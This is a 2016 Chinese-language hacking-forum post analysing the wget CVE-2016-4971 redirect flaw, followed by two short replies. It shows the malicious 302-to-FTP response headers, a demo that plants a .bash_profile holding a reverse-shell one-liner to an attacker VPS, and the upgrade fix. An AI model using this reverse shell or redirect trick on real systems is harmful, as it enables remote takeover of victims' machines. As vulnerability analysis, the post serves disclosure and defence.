搜索
查看: 1214|回复: 3

Wget漏洞(CVE-2016-4971)利用方式解析

[复制链接]

432

主题

573

帖子

2543

积分

核心成员

Rank: 8Rank: 8

积分
2543
发表于 2016-7-5 10:14:03 | 显示全部楼层 |阅读模式
本帖最后由 Jumbo 于 2016-7-5 10:17 编辑

漏洞描述

近日, CVE-2016-4971漏洞被正式披露,该漏洞影响全部旧版本wget, 黑客可以利用此漏洞对程序员和运维工程师进行钓鱼,从而获得其主机权限或者植入rootkit。

漏洞详情

wget 作为*nix 系统常用下载工具,支持http、https、ftp 等多种协议,当使用wget 下载文件时,若初始下载http服务提供的下载资源, 如果服务器将下载资源重定向到ftp服务时,wget 会默认信赖http服务器重定向的ftp 链接地址和文件名,而不做二次验证。从而可能下载到恶意钓鱼者的恶意文件,导致主机被入侵。

比如,当我们访问  wget http://attackers-server/safe_file.txt 时,若http server 返回如下响应头。

  1. HTTP/1.1 302 Found
  2. Cache-Control: private
  3. Content-Type: text/html; charset=UTF-8
  4. Location: ftp://attackers-server/.bash_profile
  5. Content-Length: 262
  6. Server: Apache
复制代码

同时我们在自己的目录下执行wget 请求,且当前home目录下不含有.bash_profile ,则我们会在自己系统home目录下下载到这个.bash_profile, 。恶意钓鱼者可以在此bash_profile 文件中写入任何恶意代码,并且我们再次启动shell 时恶意代码就会执行,从而导致我们的主机被入侵。

具体攻击实例演示

当前演示主机上wget 版本如下:

[/url]

我们写一个简单的http下载服务, 命名为testWget.py

同时在192.168.50.116 主机上开启ftp服务,且将攻击payload (bash -i >& /dev/tcp/74.207.xxx.xxx/9980 0>&1) 写入ftp服务中的.bash_profile 文件中,并且在自己主机vps 监听9980 端口。

此时在另外一台IP为 192.168.50.61 主机上的Home目录下执行 wget [url=http://192.168.50.116/noharm.txt]http://192.168.50.116/noharm.txt (注意该Home目录下没有.bash_history文件). 退出当前并再次进入shell(触发.bash_profile文件中的恶意代码执行)。

此时在我们的vps 上可以成功拿到192.168.50.61 的shell 权限。

[/url]

上述攻击实例,只是为了用实例演示漏洞的实际危害,具体攻击场景因实际情况而定。

修复方案:

升级你的wget 到GNU wget 1.18版本。

参考文献:



PS:然而这个攻击有几个前提呀..
用户正好在/home下.
2. ".bash_profile" 存在的情况下,会自动加上数字后缀保存....(.bash_profile很少会不存在呀= =)
3. 假如下载成功..这文件名也太惹眼了..
不过茫茫人海总会有人上当的... 这思路很给力啊 哈哈

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?Join BUC

x
您可以更新记录, 让好友们知道您在做什么...

2

主题

52

帖子

196

积分

我是新手

Rank: 1

积分
196
发表于 2016-7-11 18:17:18 | 显示全部楼层
还要多看2遍

0

主题

23

帖子

99

积分

我是新手

Rank: 1

积分
99
发表于 2016-11-5 19:22:26 | 显示全部楼层
这个感觉更适用些
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表